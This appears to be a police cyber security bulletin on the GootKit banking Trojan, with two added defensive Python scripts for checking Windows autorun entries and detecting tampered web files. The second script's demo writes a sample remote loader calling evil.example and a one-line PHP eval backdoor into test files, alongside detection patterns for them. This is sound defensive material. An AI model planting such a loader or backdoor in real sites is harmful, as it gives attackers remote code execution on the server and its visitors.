
ACG-CYBER SECURITY BULLETIN NO 124 UNDERSTANDING GOOTKIT MALWARE

The following information was obtained from different cyber security sources for notification to all parties concerned pursuant to the mandate of the Philippine National Police Anti-Cybercrime Group (PNP ACG).

The information provided was classified as “Restricted” pursuant to the PNP Regulation 200-012 on Document Security and Impact Rating as high based on PNP Information Communication Technology (ICT) Security Manual s.2010-01 p. 22 and p.129.

SUMMARY

GootKit is a JavaScript-based banking Trojan that uses web injects, records user actions and relies on a distinctive persistence mechanism in order to steal user credentials from infected machines. It also opens a backdoor and downloads additional files onto the compromised computer.

This Trojan usually arrives as a link in a spam e-mail message, or it may be downloaded or spread silently through web exploits. Once executed, it creates a registry entry that runs every time Windows starts up. The malware then records the user's actions while they interact with a login page; those recordings are believed to be sent to the fraudster by e-mail.
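An added triage check, not part of this bulletin, for the start-up persistence described above: when run on Windows it reads the standard Run and RunOnce keys under HKCU and HKLM and flags entries that launch a script host, point at a script file, force a script engine, or live in a user-writable directory. The key paths, the list of script hosts and the thresholds are assumptions (the bulletin only states that a registry entry runs at start-up), and the sample entries are constructed.

```python
"""Triage Windows autostart entries for script-host launches (added example)."""
import re

# Assumption: the classic per-user and per-machine autostart keys.
AUTORUN_KEYS = (
    r"Software\Microsoft\Windows\CurrentVersion\Run",
    r"Software\Microsoft\Windows\CurrentVersion\RunOnce",
)
# Assumption: interpreters a JavaScript/script payload would be launched through.
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe")
# Script extensions, matched only when followed by a quote, whitespace or end of line.
SCRIPT_EXT_RE = re.compile(r'\.(js|jse|vbs|vbe|wsf|hta|ps1|bat|cmd)(?=["\s]|$)')
# Directories an unprivileged user can normally write to (lower-cased substrings).
USER_WRITABLE = ("\\appdata\\", "\\users\\public\\", "\\programdata\\", "\\temp\\")


def classify_autorun(name, command):
    """Return the reasons an autostart command looks suspicious (empty = nothing found)."""
    cmd = command.lower()
    reasons = []
    if any(host in cmd for host in SCRIPT_HOSTS):
        reasons.append("launches a script host")
    if SCRIPT_EXT_RE.search(cmd):
        reasons.append("runs a script file")
    if "//e:" in cmd:  # wscript/cscript //E:<engine> forces e.g. JScript regardless of extension
        reasons.append("forces a script engine via //E:")
    if any(d in cmd for d in USER_WRITABLE):
        reasons.append("points into a user-writable directory")
    return reasons


def is_suspicious(reasons):
    """A script host or script file is enough on its own; a user-writable path alone is a weak signal."""
    return ("launches a script host" in reasons or "runs a script file" in reasons
            or len(reasons) >= 2)


def review_entries(entries):
    """Map entry name -> reasons for every (name, command) pair worth a closer look."""
    flagged = {}
    for name, command in entries:
        reasons = classify_autorun(name, command)
        if is_suspicious(reasons):
            flagged[name] = reasons
    return flagged


def collect_live_autoruns():
    """Read Run/RunOnce values from HKCU and HKLM; returns [] when not on Windows."""
    try:
        import winreg
    except ImportError:
        return []
    entries = []
    for hive in (winreg.HKEY_CURRENT_USER, winreg.HKEY_LOCAL_MACHINE):
        for subkey in AUTORUN_KEYS:
            try:
                with winreg.OpenKey(hive, subkey) as key:
                    index = 0
                    while True:
                        try:
                            name, value, _ = winreg.EnumValue(key, index)
                        except OSError:  # no more values under this key
                            break
                        entries.append((name, str(value)))
                        index += 1
            except OSError:  # key absent in this hive
                continue
    return entries


# Constructed sample entries: two legitimate-looking ones and one script-host loader.
SAMPLE_ENTRIES = [
    ("OneDrive", r'"C:\Users\juan\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    ("SecurityHealth", r"C:\Windows\System32\SecurityHealthSystray.exe"),
    ("update", r'wscript.exe //B //E:JScript "C:\Users\Public\update.js"'),
]

if __name__ == "__main__":
    live = collect_live_autoruns()
    for entry, why in review_entries(live or SAMPLE_ENTRIES).items():
        print(entry, "->", "; ".join(why))
```

On a live machine the script reviews the real Run/RunOnce values and falls back to the constructed samples elsewhere. It does not cover the 32-bit WOW6432Node keys, other users' hives, scheduled tasks or services, so an empty result is not proof of a clean system; the "OneDrive" sample shows why a user-writable path is deliberately not enough on its own to raise an entry.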

Acting as a bot under the control of its command-and-control server, the Trojan may perform the following actions on the compromised computer:

  • Access predetermined remote locations;
  • Download and execute files;
  • Gather confidential information;
  • Inject arbitrary JavaScript code into HTML files (web injects);
  • List, start, stop and remove processes;
  • List, create, modify and delete registry sub-keys;
  • List, create, modify and delete files;
  • Modify the content of FTP servers;
  • Send e-mails; and
  • Upload files from the compromised computer.

GootKit can strike in two different ways: by infecting the PC or by attacking a web site. It connects to web servers using stolen FTP/MySQL credentials and modifies their HTML and PHP files with extra code. The GootKit operators search thousands of infected PCs for server passwords, mail passwords, and unencrypted FTP and MySQL passwords, which they then use to compromise the target servers.
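An added server-side check, not part of this bulletin, for the FTP-borne tampering described above: it records a SHA-256 baseline of every HTML and PHP file under a web root, then reports files that changed or appeared and scans them for content typical of an injected loader or PHP backdoor. The inject heuristics, the allow-list of script hosts and the demo site are all assumptions and the files are constructed; the bulletin does not describe GootKit's injected code.

```python
"""Web-root integrity baseline plus inject scan for HTML/PHP files (added example)."""
import hashlib
import json
import os
import re
import shutil
import tempfile

WEB_EXTS = (".html", ".htm", ".php")

# Heuristics for injected content (assumptions, not signatures from the bulletin).
PHP_EVAL_RE = re.compile(r"eval\s*\(\s*(base64_decode|gzinflate|str_rot13|gzuncompress)\s*\(", re.I)
SCRIPT_SRC_RE = re.compile(r"<script[^>]*\ssrc\s*=\s*[\"']?(?:https?:)?//([^/\"'\s>]+)", re.I)
HIDDEN_IFRAME_RE = re.compile(r"<iframe[^>]*\b(?:width|height)\s*=\s*[\"']?0\b", re.I)
OBFUSCATED_JS_RE = re.compile(r"\b(?:unescape|String\.fromCharCode)\s*\(", re.I)


def web_files(root):
    """Yield web-root-relative paths (forward slashes) of all HTML/PHP files."""
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.lower().endswith(WEB_EXTS):
                full = os.path.join(dirpath, name)
                yield os.path.relpath(full, root).replace(os.sep, "/")


def sha256_file(path):
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def baseline(root):
    """Map relative path -> SHA-256 for every HTML/PHP file under root (store this offline)."""
    return {rel: sha256_file(os.path.join(root, rel)) for rel in web_files(root)}


def scan_content(text, allowed_hosts):
    """Return reasons a file's content looks injected; external scripts are fine only from allowed_hosts."""
    reasons = []
    if PHP_EVAL_RE.search(text):
        reasons.append("eval() of a decoded payload")
    for host in SCRIPT_SRC_RE.findall(text):
        if host.lower() not in allowed_hosts:
            reasons.append(f"external script from {host}")
    if HIDDEN_IFRAME_RE.search(text):
        reasons.append("zero-sized iframe")
    if OBFUSCATED_JS_RE.search(text):
        reasons.append("obfuscated JavaScript")
    return reasons


def check_site(root, base, allowed_hosts=frozenset()):
    """Compare the live tree against the baseline and scan every changed or new file."""
    current = baseline(root)
    report = {
        "modified": sorted(p for p in current if p in base and current[p] != base[p]),
        "added": sorted(p for p in current if p not in base),
        "removed": sorted(p for p in base if p not in current),
        "flags": {},
    }
    for rel in report["modified"] + report["added"]:
        with open(os.path.join(root, rel), encoding="utf-8", errors="replace") as fh:
            reasons = scan_content(fh.read(), allowed_hosts)
        if reasons:
            report["flags"][rel] = reasons
    return report


def demo():
    """Constructed site: baseline a clean tree, then simulate edits made with stolen FTP credentials."""
    root = tempfile.mkdtemp(prefix="site-")
    os.makedirs(os.path.join(root, "inc"))
    files = {
        "index.html": '<html><body><h1>Hello</h1>'
                      '<script src="https://cdn.example.com/app.js"></script></body></html>\n',
        "inc/config.php": "<?php $db_host = 'localhost'; ?>\n",
        "about.html": "<html><body><p>About us</p></body></html>\n",
    }
    for rel, text in files.items():
        with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
            fh.write(text)
    base = baseline(root)
    # Simulated tampering: a remote loader appended to the page and a PHP backdoor in an include.
    with open(os.path.join(root, "index.html"), "a", encoding="utf-8") as fh:
        fh.write('<script src="http://evil.example/inj.js"></script>\n')
    with open(os.path.join(root, "inc", "config.php"), "a", encoding="utf-8") as fh:
        fh.write("<?php eval(base64_decode($_POST['k'])); ?>\n")
    report = check_site(root, base, allowed_hosts={"cdn.example.com"})
    shutil.rmtree(root, ignore_errors=True)
    return report


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Keep the baseline off the web server (an attacker holding the FTP password can rewrite a baseline stored next to the site) and refresh it after each legitimate deployment; the heuristics only guide where to look first, since the hash comparison alone already tells you which files were touched.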

GootKit’s overall prevalence in the wild is rather limited compared to other malware of its class. This is due to its operators keeping campaigns focused on a small number of countries.


RECOMMENDATION

All PNP personnel as well as the public are advised to follow these tips in order to prevent GootKit malware from infecting their devices and computer systems, to wit:

  • Don’t install or even run anything from an untrusted source;
  • Turn off file sharing if it is not necessary;
  • Always run updated anti-virus on your computers;
  • Disable autoplay to prevent automatic launching of executable files;
  • Always update your software with the latest patch available;
  • Regularly change the passwords for FTP and database accounts, and do not save them in clear text in FTP or database client software, since GootKit harvests stored credentials from infected PCs;
  • Say NO to unknown links and avoid downloading attachments from unrecognized sources; and
  • Always back up your data on an external device.

For additional information, please refer to the following websites:

  • https://www.symantec.com/security_response/writeup.jsp?docid=2010-051118-0604-99
  • http://www.virusradar.com/en/Win32_Gootkit.V/description
  • http://softflare.com/index.php?id=116
  • https://devcentral.f5.com/articles/gootkit-malware-new-targets-around-the-world-17867

POINT OF CONTACT

Please contact PCINSP ANGELICA STARLIGHT L. RIVERA, Chief, Personnel Records Management Section, thru e-mail or on telephone number (632) 7230401 local 3562 for any inquiries related to this CYBER SECURITY BULLETIN.